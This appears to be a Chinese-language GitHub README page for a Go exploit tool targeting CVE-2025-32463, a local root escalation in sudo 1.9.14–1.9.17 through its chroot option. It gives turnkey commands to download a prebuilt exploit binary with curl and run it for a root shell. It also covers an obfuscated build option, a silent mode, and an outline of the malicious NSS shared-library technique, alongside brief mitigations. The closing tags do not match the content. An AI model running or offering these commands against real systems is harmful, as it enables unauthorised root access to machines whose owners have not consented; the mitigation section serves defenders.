Nowafen/CVE-2025-32463

GitHub: Nowafen/CVE-2025-32463

针对 sudo 1.9.14–1.9.17 中 CVE-2025-32463 本地提权漏洞的 Go 语言自动化利用工具,通过操纵 chroot 环境加载恶意共享库获取 root 权限。

Stars: 24 | Forks: 2

# CVE-2025-32463 Exploit [![GitHub stars](https://img.shields.io/github/stars/Nowafen/CVE-2025-32463)](https://github.com/Nowafen/CVE-2025-32463/stargazers) [![GitHub license](https://img.shields.io/github/license/Nowafen/CVE-2025-32463)](https://github.com/Nowafen/CVE-2025-32463/blob/main/LICENSE) ## 概述 本仓库提供了一个基于 Go 的 **Exploit 工具**,用于针对 **CVE-2025-32463**。这是 **sudo 1.9.14 到 1.9.17 版本**中的一个严重的本地权限提升漏洞 (CVSS 9.3)。它允许未经授权的本地用户通过利用 `--chroot (-R)` 选项中的缺陷来获取 root 访问权限。 **⚠️ 警告**:仅供教育和测试目的使用。请在隔离环境(例如虚拟机)中使用。严禁用于恶意用途。 ## 漏洞详情 - **CVE ID**: CVE-2025-32463 - **受影响版本**: sudo 1.9.14–1.9.17 - **影响**: 本地权限提升至 root - **描述**: 该 Exploit 通过操纵 chroot 环境来加载恶意共享库,从而将 UID/GID 设置为 0 并生成一个 root shell。 ## 前置条件 - Go 1.2+ - gcc - libc-dev - 存在漏洞的 sudo 版本 - 具有 sudo 访问权限和 `--chroot` 权限的非特权用户 ## 快速开始 ### 下载预编译二进制文件 ``` curl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit chmod +x exploit ./exploit --execution # Launches root shell ``` ### 从源码编译 ``` git clone https://github.com/Nowafen/CVE-2025-32463.git cd CVE-2025-32463 go build -o exploit # Or use garble for obfuscation ./exploit --execution ``` ## 用法 | 命令 | 描述 | |---------|-------------| | `./exploit --help` | 显示使用帮助 | | `./exploit --about` | 显示 CVE 详情 | | `./exploit --execution` | 运行 Exploit(打开 root shell) | | `./exploit --execution --silent` | 静默模式执行 | **验证**:在 root shell 中,运行 `id`(应显示 `uid=0(root)`)或 `whoami`(应显示 `root`)。 ## 工作原理(概述) 1. 创建临时目录 `/tmp/sudowoot.stage.*` 2. 生成用于 root shell 的恶意 C 代码 (`woot1337.c`) 3. 设置带有 NSS 配置的虚假 chroot 4. 编译为共享库 (`libnss_/woot1337.so.2`) 5. 运行 `sudo -R woot woot` 加载库并进行提权 6. 自动清理临时文件 ## 缓解措施 - 将 sudo 更新至最新版本 - 禁用 chroot:在 `/etc/sudoers` 中添加 `Defaults !use_chroot` ## 参考 - [NVD 条目](https://nvd.nist.gov/vuln/detail/CVE-2025-32463) ## 免责声明 本工具仅供安全研究使用。作者不对任何滥用行为负责。请始终负责任地进行测试。 **由 [MNM](https://x.com/RedTeamElite) 构建**
标签:CSV导出, EVTX分析, Go语言, Web报告查看器, 日志审计, 本地提权, 程序破解